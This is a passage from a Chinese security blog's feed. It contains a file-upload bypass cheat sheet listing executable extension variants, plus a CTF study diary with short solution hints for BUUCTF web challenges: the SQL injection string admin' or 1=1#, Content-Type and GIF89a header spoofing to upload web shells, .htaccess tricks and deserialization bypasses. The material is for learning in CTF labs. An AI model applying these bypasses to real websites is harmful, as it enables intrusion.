M65.8613592,203.471174 C65.1597571,204.244846 63.6654083,204.03712 62.5716717,202.981538 C61.4524999,201.94927 61.1409122,200.484596 61.8446341,199.710926 C62.5547146,198.935137 64.0575422,199.15346 65.1597571,200.200564 C66.2704506,201.230712 66.6095936,202.705984 65.8613592,203.471174 Z M75.3025151,206.281542 C74.9930474,207.284134 73.553809,207.739857 72.1039724,207.313809 C70.6562556,206.875043 69.7087748,205.700761 70.0012857,204.687571 C70.302275,203.678621 71.7478721,203.20382 73.2083069,203.659543 C74.6539041,204.09619 75.6035048,205.261994 75.3025151,206.281542 Z M86.046947,207.473627 C86.0829806,208.529209 84.8535871,209.404622 83.3316829,209.4237 C81.8013,209.457614 80.563428,208.603398 80.5464708,207.564772 C80.5464708,206.498591 81.7483088,205.631657 83.2786917,205.606221 C84.8005962,205.576546 86.046947,206.424403 86.046947,207.473627 Z M96.6021471,207.069023 C96.7844366,208.099171 95.7267341,209.156872 94.215428,209.438785 C92.7295577,209.710099 91.3539086,209.074206 91.1652603,208.052538 C90.9808515,206.996955 92.0576306,205.939253 93.5413813,205.66582 C95.054807,205.402984 96.4092596,206.021919 96.6021471,207.069023 Z" fill="#161614"></path></g></svg></div><div class="notion-preview-card-domain">Github</div></div><div class="notion-preview-card-title">NotionNext</div><div class="notion-external-subtitle-item"><div class="notion-external-subtitle-item-name">Owner</div><span class="notion-external-subtitle-item-desc">tangly1024</span></div><div class="notion-external-subtitle-item"><div class="notion-external-subtitle-item-name">Updated</div><span class="notion-external-subtitle-item-desc">Sep 17, 2025</span></div><div class="notion-preview-card-github-shields"><img src="https://img.shields.io/github/stars/tangly1024/NotionNext?logo=github" alt=""/><img src="https://img.shields.io/github/last-commit/tangly1024/NotionNext" alt=""/></div></div></div></a></span></span></h3></main></div>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[文件上传]]></title>
            <link>https://510517.xyz/article/1e2233a6-c40b-80b4-a355-caeea2200de9</link>
            <guid>https://510517.xyz/article/1e2233a6-c40b-80b4-a355-caeea2200de9</guid>
            <pubDate>Sun, 27 Apr 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<div id="notion-article" class="mx-auto overflow-hidden "><main class="notion light-mode notion-page notion-block-1e2233a6c40b80b4a355caeea2200de9"><div class="notion-viewport"></div><div class="notion-collection-page-properties"></div><div class="notion-text notion-block-20a233a6c40b80f6ae09d7df6101d8c0">文件上传总结:<a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://www.anquanke.com/post/id/164561">https://www.anquanke.com/post/id/164561</a></div><h4 class="notion-h notion-h3 notion-h-indent-0 notion-block-20a233a6c40b8056baafc7ac9a987b16" data-id="20a233a6c40b8056baafc7ac9a987b16"><span><div id="20a233a6c40b8056baafc7ac9a987b16" class="notion-header-anchor"></div><a class="notion-hash-link" href="#20a233a6c40b8056baafc7ac9a987b16" title="文件上传可解析后缀"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>文件上传可解析后缀</b></span></span></h4><div class="notion-text notion-block-20a233a6c40b80f28412ecb5b5a244b6"><b>asp/aspx</b></div><table class="notion-simple-table notion-block-20a233a6c40b8016827df9fc24d4d32e"><tbody><tr class="notion-simple-table-row notion-block-20a233a6c40b80c19160cc3f3b8774ac"><td class="" style="width:120px"><div class="notion-simple-table-cell"><code class="notion-inline-code">1</code></div></td><td class="" style="width:120px"><div class="notion-simple-table-cell"><code class="notion-inline-code">asp,aspx,asa,asax,ascx,ashx,asmx,cer,aSp,aSpx,aSa,aSax,aScx,aShx,aSmx,cEr</code></div></td></tr></tbody></table><div class="notion-text notion-block-20a233a6c40b80088515f219133f7375"><b>php</b></div><table class="notion-simple-table notion-block-20a233a6c40b80af8ce7c5abbd672637"><tbody><tr class="notion-simple-table-row notion-block-20a233a6c40b8029a07ceb55423b8762"><td class="" style="width:120px"><div class="notion-simple-table-cell"><code class="notion-inline-code">1</code></div></td><td class="" style="width:120px"><div class="notion-simple-table-cell"><code class="notion-inline-code">php,php5,php4,php3,php2,pHp,pHp5,pHp4,pHp3,pHp2,html,htm,phtml,pht,Html,Htm,pHtml</code></div></td></tr></tbody></table><div class="notion-text notion-block-20a233a6c40b80768ed2eb82ead5690a"><b>jsp</b></div><table class="notion-simple-table notion-block-20a233a6c40b8031af67d77a6879fb12"><tbody><tr class="notion-simple-table-row notion-block-20a233a6c40b8001ac5aeacbb2e9b8fd"><td class="" style="width:120px"><div class="notion-simple-table-cell"><code class="notion-inline-code">1</code></div></td><td class="" style="width:120px"><div class="notion-simple-table-cell"><code class="notion-inline-code">jsp,jspa,jspx,jsw,jsv,jspf,jtml,jSp,jSpx,jSpa,jSw,jSv,jSpf,jHtml</code></div></td></tr></tbody></table><div class="notion-text notion-block-20a233a6c40b80fa84f0e8d9a5ee62bb">文件上传文件头绕过</div><div class="notion-text notion-block-213233a6c40b80d28254f15de65ebf4b">sunnydogwang/11xiaosai-web1-junzipop</div><div class="notion-blank notion-block-213233a6c40b805da4aaf8133870f950"> </div></main></div>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[学习日记-5(buu)]]></title>
            <link>https://510517.xyz/article/1.24</link>
            <guid>https://510517.xyz/article/1.24</guid>
            <pubDate>Sun, 22 Dec 2024 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<div id="notion-article" class="mx-auto overflow-hidden "><main class="notion light-mode notion-page notion-block-164233a6c40b80ce89dbf80f19ee3730"><div class="notion-viewport"></div><div class="notion-collection-page-properties"></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b8006a0f6e820e7d4db02" data-id="211233a6c40b8006a0f6e820e7d4db02"><span><div id="211233a6c40b8006a0f6e820e7d4db02" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b8006a0f6e820e7d4db02" title="[极客大挑战 2019]EasySQL"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[极客大挑战 2019]EasySQL</b></span></span></h2><div class="notion-text notion-block-211233a6c40b80f28339ff60d1732ffd">万能密码 admin&#x27; or 1=1# 密码随便</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b80aab4d7f30330e666fd" data-id="211233a6c40b80aab4d7f30330e666fd"><span><div id="211233a6c40b80aab4d7f30330e666fd" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b80aab4d7f30330e666fd" title="[极客大挑战 2019]Havefun"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[极客大挑战 2019]Havefun</b></span></span></h2><div class="notion-text notion-block-211233a6c40b80e3baa7e965ac9d03e6">查看源码?cat=dog</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b80de906ced4a59de7bed" data-id="211233a6c40b80de906ced4a59de7bed"><span><div id="211233a6c40b80de906ced4a59de7bed" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b80de906ced4a59de7bed" title="[ACTF2020 新生赛]Include"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[ACTF2020 新生赛]Include</b></span></span></h2><div class="notion-text notion-block-211233a6c40b80baab92c655210bd18e">直接伪协议</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b8089a27ccf654d682b21" data-id="211233a6c40b8089a27ccf654d682b21"><span><div id="211233a6c40b8089a27ccf654d682b21" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b8089a27ccf654d682b21" title="[HCTF 2018]WarmUp"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[HCTF 2018]WarmUp</b></span></span></h2><div class="notion-text notion-block-211233a6c40b8028abd8f615b0f091bd">查看源码发现source.php,然后有发现hint.php,发现ffffllllaaaagggg</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b80dda36fd86755039576" data-id="211233a6c40b80dda36fd86755039576"><span><div id="211233a6c40b80dda36fd86755039576" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b80dda36fd86755039576" title="[ACTF2020 新生赛]Exec"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[ACTF2020 新生赛]Exec</b></span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-20a233a6c40b8043a6aeeef1f2026819" data-id="20a233a6c40b8043a6aeeef1f2026819"><span><div id="20a233a6c40b8043a6aeeef1f2026819" class="notion-header-anchor"></div><a class="notion-hash-link" href="#20a233a6c40b8043a6aeeef1f2026819" title="[GXYCTF2019]Ping Ping Ping"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[GXYCTF2019]Ping Ping Ping</b></span></span></h2><div class="notion-text notion-block-20a233a6c40b80c7a42edd2963caeb3d">通过尝试发现” ‘ ? * flag \ {等被禁</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-20a233a6c40b8083aa63c8d05318ce97" data-id="20a233a6c40b8083aa63c8d05318ce97"><span><div id="20a233a6c40b8083aa63c8d05318ce97" class="notion-header-anchor"></div><a class="notion-hash-link" href="#20a233a6c40b8083aa63c8d05318ce97" title="[极客大挑战 2019]Secret File"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[极客大挑战 2019]Secret File</b></span></span></h2><div class="notion-text notion-block-20a233a6c40b80fba159c33e90c209f0">查看源码发现/Archive_room.php,点击按钮后快速跳转网页,进行抓包发现</div><div class="notion-text notion-block-20a233a6c40b80f09396ec8c2586aba9">secr3t.php</div><div class="notion-text notion-block-20a233a6c40b804b90cfcb5f56f74d31">使用伪协议</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-20a233a6c40b80349e5dc1dac5a97ec4" data-id="20a233a6c40b80349e5dc1dac5a97ec4"><span><div id="20a233a6c40b80349e5dc1dac5a97ec4" class="notion-header-anchor"></div><a class="notion-hash-link" href="#20a233a6c40b80349e5dc1dac5a97ec4" title="[ACTF2020 新生赛]BackupFile"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[ACTF2020 新生赛]BackupFile</b></span></span></h2><div class="notion-text notion-block-20a233a6c40b80f3ba0ec3a18f4d60c5">使用dirsearch扫,发现/index.php.bak,下载后查看发现代码</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-20a233a6c40b80f7b9b2de80930e1c5c" data-id="20a233a6c40b80f7b9b2de80930e1c5c"><span><div id="20a233a6c40b80f7b9b2de80930e1c5c" class="notion-header-anchor"></div><a class="notion-hash-link" href="#20a233a6c40b80f7b9b2de80930e1c5c" title="[极客大挑战 2019]Upload"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[极客大挑战 2019]Upload</b></span></span></h2><div class="notion-text notion-block-20a233a6c40b80e4b43cd171588de2b0">上传文件抓包,发现直接改后缀没用,修改Content-Type文件内容格式为image/png</div><div class="notion-text notion-block-20a233a6c40b8037af87dafd2d5fc657">尝试发现可以使用phtml作为后缀,同时过滤&lt;?,将一句话木马改为</div><div class="notion-text notion-block-20a233a6c40b80b089c1ef6d0698e862">发现还是不行,在前面添加一个<b>GIF89a(相当于在16进制格式添加gif文件头)成功上传</b></div><div class="notion-text notion-block-20a233a6c40b80a2ba15cda37fd1c561">访问/upload/1.phtml</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-20c233a6c40b808cad83fbba3810bb94" data-id="20c233a6c40b808cad83fbba3810bb94"><span><div id="20c233a6c40b808cad83fbba3810bb94" class="notion-header-anchor"></div><a class="notion-hash-link" href="#20c233a6c40b808cad83fbba3810bb94" title="[ACTF2020 新生赛]Upload"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[ACTF2020 新生赛]Upload</b></span></span></h2><div class="notion-text notion-block-20c233a6c40b805fb251c3df46cff274">传简单的一句话木马的png抓包改为phtml</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b804190e0db0cfbf974cd" data-id="211233a6c40b804190e0db0cfbf974cd"><span><div id="211233a6c40b804190e0db0cfbf974cd" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b804190e0db0cfbf974cd" title="[MRCTF2020]你传你🐎呢"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[MRCTF2020]你传你🐎呢</b></span></span></h2><div class="notion-text notion-block-211233a6c40b80dc86d0d32aa0b5066b">上传文件.htaccess</div><div class="notion-text notion-block-211233a6c40b8042917de768f8fcdffa">上传文件1.png</div><div class="notion-text notion-block-211233a6c40b80aea703c1742fc5a85e">Content-Type: 都改为image/jpeg,蚁剑连接,根目录找到flag</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b802b9998c35fa0bb7cfc" data-id="211233a6c40b802b9998c35fa0bb7cfc"><span><div id="211233a6c40b802b9998c35fa0bb7cfc" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b802b9998c35fa0bb7cfc" title="[GXYCTF2019]BabyUpload"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[GXYCTF2019]BabyUpload</b></span></span></h2><div class="notion-text notion-block-211233a6c40b80ac8e68cbcacb79951e">步骤与上一题一样,一句话木马改为</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-20c233a6c40b8056b84ad555b191181d" data-id="20c233a6c40b8056b84ad555b191181d"><span><div id="20c233a6c40b8056b84ad555b191181d" class="notion-header-anchor"></div><a class="notion-hash-link" href="#20c233a6c40b8056b84ad555b191181d" title="[极客大挑战 2019]Knife"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[极客大挑战 2019]Knife</b></span></span></h2><div class="notion-text notion-block-210233a6c40b80318b4ffd25deca1f76"><b>
直接蚁剑连接,flag在根目录</b></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-210233a6c40b809b9094cb850742dc81" data-id="210233a6c40b809b9094cb850742dc81"><span><div id="210233a6c40b809b9094cb850742dc81" class="notion-header-anchor"></div><a class="notion-hash-link" href="#210233a6c40b809b9094cb850742dc81" title="[极客大挑战 2019]PHP"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[极客大挑战 2019]PHP</b></span></span></h2><div class="notion-text notion-block-210233a6c40b806b947cc278dc62531f"><b>
使用dirsearch扫发现/www.zip,下载解压发现是反序列化</b></div><div class="notion-text notion-block-210233a6c40b8033b893ca3021fe60ba">利用对象属性个数的值大于真实属性个数绕过__wakeup()</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-210233a6c40b80b69d11fbfb034f7ad7" data-id="210233a6c40b80b69d11fbfb034f7ad7"><span><div id="210233a6c40b80b69d11fbfb034f7ad7" class="notion-header-anchor"></div><a class="notion-hash-link" href="#210233a6c40b80b69d11fbfb034f7ad7" title="[极客大挑战 2019]BuyFlag"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[极客大挑战 2019]BuyFlag</b></span></span></h2><div class="notion-text notion-block-210233a6c40b809cbdeafdc540906a1a">在payflag页面查看源码,发现相关信息</div><div class="notion-text notion-block-210233a6c40b803d83e4f60dadf44193">直接传发现没反应,用bp抓包,传了还是没反应,看见cookie:user=0,改为1</div><div class="notion-text notion-block-210233a6c40b8076b6b6fd07685ce5bd">提示Nember lenth is too long</div><div class="notion-text notion-block-210233a6c40b80f38253eec17b306bf6">改为科学计数法</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b807ba048c31a32828d17" data-id="211233a6c40b807ba048c31a32828d17"><span><div id="211233a6c40b807ba048c31a32828d17" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b807ba048c31a32828d17" title="[RoarCTF 2019]Easy Calc"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[RoarCTF 2019]Easy Calc</b></span></span></h2><div class="notion-text notion-block-211233a6c40b80fead3fc76713c53c22">查看源码发现calc.php</div><div class="notion-text notion-block-211233a6c40b806b938df6d13d28d60c">利用%20绕过对num的检测,查看phpinfo()可以看到禁用函数</div><div class="notion-text notion-block-211233a6c40b8031bc48d6e3020345d9">利用chr函数构造进行绕过</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b805b9335e8a367706df7" data-id="211233a6c40b805b9335e8a367706df7"><span><div id="211233a6c40b805b9335e8a367706df7" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b805b9335e8a367706df7" title="[HCTF 2018]admin"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[HCTF 2018]admin</b></span></span></h2><div class="notion-text notion-block-211233a6c40b801aa39ac25fb387f6ed">直接爆破,密码是123</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b80f792ccce32d5da69f7" data-id="211233a6c40b80f792ccce32d5da69f7"><span><div id="211233a6c40b80f792ccce32d5da69f7" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b80f792ccce32d5da69f7" title="[ZJCTF 2019]NiZhuanSiWei"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>[ZJCTF 2019]NiZhuanSiWei</b></span></span></h2><div class="notion-text notion-block-211233a6c40b80e2ba79f065f57cd040">通过data协议包含输入流然后利用伪协议读取useless.php</div><div class="notion-text notion-block-211233a6c40b80ca9b62e386e265977a">解码后得到</div><div class="notion-text notion-block-211233a6c40b8060a5b5e14609fc4473">即可</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-211233a6c40b80bb9833cc23a474cf2b" data-id="211233a6c40b80bb9833cc23a474cf2b"><span><div id="211233a6c40b80bb9833cc23a474cf2b" class="notion-header-anchor"></div><a class="notion-hash-link" href="#211233a6c40b80bb9833cc23a474cf2b" title="[MRCTF2020]Ez_bypass"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 